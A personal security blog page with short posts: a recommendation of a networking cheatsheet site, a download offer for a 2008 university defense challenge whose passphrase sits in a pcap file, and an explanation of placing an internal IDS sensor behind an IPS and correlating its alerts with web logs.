Ayoi's

When I visit SANS Handler’s Diary today, there’s only one short entry by the Handler of the day; Jim Clausing. That post is regarding one website that provides cheatsheets on the network protocols and some challenge as well. So I browse into that website and heck, it is very informative and useful. If you’re into network thingy like protocols, design and others, I recommend that you bookmark it. The name? Packetlife.net.

p/s: Now I know that RJ45 is not the name of that connector actually .

OKay, let me share with you the UiTM i-Hack 2008 Defense Challenge question. The download link will be at the bottom of this post and before you start downloading the questions, please read the condition first.

The Condition

You should be able to download the compressed file that contains:

a). Question.rar

b). password.pcap

This file should be able to be uncompressed into your system without any problem. However the Question.rar file is protected with a pass phrase. Meaning the the required “password” will have more than one word (so that’s why I use pass phrase term) and also includes the white spaces as well. The pass phrase can be found in the password.pcap file.

It is not that difficult and I think most of you perhaps can answer all the questions within few hours top. Perhaps you guys have any new ideas on how to create this type of challenge in the future.

Thanks and good luck

You can retrieve the question from this link : http://hazrulnz.net/files/

One of my colleagues from the technical support department asked me on the best emplacement of the internal sensor (IDS) if one network has IPS implemented as well. So I just give him a simple diagram to show him the usual emplacement of internal sensor when we have IPS implemented as well.

The reason why I would place my internal sensor (in this case DMZ sensor) behind IPS because:

a). I always believe that all the preventive measures will be defeated sooner or later. And if the DMZ sensor emplace in front of IPS, then what kind of indication we can have if the attack bypassed the IPS?

b). IF the sensor emplaced in front of the IPS, how do we know that one particular attack has been blocked or not by IPS?

Usually for this kind of emplacement, a good correlation between the alerts coming from the external IDS and internal IDS will help or assist analyst on determining whether the attack bypassed the preventive measures in form of firewalls and IPS. To enhance the identification process, both of the alerts will be compared against the logs retrieved from the targeted server.

As example let say the external sensor produce one alert stating that there is one remote file inclusion attempt on the web server. IF the internal sensor also produce the same alert, it means that this attempt successfully bypass the firewall (of cause) and the IPS as well. Only then the alert will be produced to the analyst console and IF only external sensor produce the alert, then it can be discarded or not presented to the analyst console. It may be used for statistical purpose perhaps.

Also another step will be if the external and internal sensor produce the same alert, then it will be compared against the web log obtained from the targeted web server. And if the response code for that attempt is 200 then these alerts will be produced to the analyst console, else those will be discarded.

BUT then my colleague said

“That’s what I’ve explained to them but their question is Why internal sensor generate too few alerts compared to the external sensor?”

I told him, “That means that their IPS has done a good job la !”

“Yeah, that’s what I thought so and I told them that but they still asking the same question.”

I’m out of words…